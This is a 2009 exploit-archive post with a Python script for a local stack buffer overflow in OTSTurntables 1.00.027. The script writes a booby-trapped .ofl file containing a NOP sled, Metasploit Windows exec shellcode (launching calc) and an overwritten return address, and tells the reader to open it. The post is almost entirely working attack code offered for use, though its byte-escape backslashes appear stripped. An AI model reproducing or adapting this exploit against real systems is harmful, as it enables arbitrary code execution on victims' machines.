
otsturntablesofl-overflow.txt

Posted on 14 January 2009

# OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit # Discovered & exploited bY suN8Hclf # crimson.loyd@gmail.com, blacksideofthesun.linuxsecured.net # Tested on: Windows XP SP2 Polish Full patched # # Only 274 bytes for shellcode. Wanna more, exploit SEH !!! # # Thanks to Myo and to everyone who knows what hacking really is # Not for money dude, only for fun !!! print "=====================================================================" print " OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit" print " bY suN8Hclf (crimson.loyd@gmail.com)" print "=====================================================================" nops = "x90" * 4 ret = "x75x52x46"; # call ebx # win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com shellcode = ( "x29xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xc9" "x2cxc9x40x83xebxfcxe2xf4x35xc4x8dx40xc9x2cx42x05" "xf5xa7xb5x45xb1x2dx26xcbx86x34x42x1fxe9x2dx22x09" "x42x18x42x41x27x1dx09xd9x65xa8x09x34xcexedx03x4d" "xc8xeex22xb4xf2x78xedx44xbcxc9x42x1fxedx2dx22x26" "x42x20x82xcbx96x30xc8xabx42x30x42x41x22xa5x95x64" "xcdxefxf8x80xadxa7x89x70x4cxecxb1x4cx42x6cxc5xcb" "xb9x30x64xcbxa1x24x22x49x42xacx79x40xc9x2cx42x28" "xf5x73xf8xb6xa9x7ax40xb8x4axecxb2x10xa1xdcx43x44" "x96x44x51xbex43x22x9exbfx2ex4fxa8x2cxaax02xacx38" "xacx2cxc9x40" ) num = 276 - 4 - 160 buff = "x41" * num exploit = nops + shellcode + buff + ret try: out_file = open("open_me.ofl",'w') out_file.write(exploit) out_file.close() raw_input(" Now open open_me.ofl file to exploit bug! ") except: print "WTF?"

 
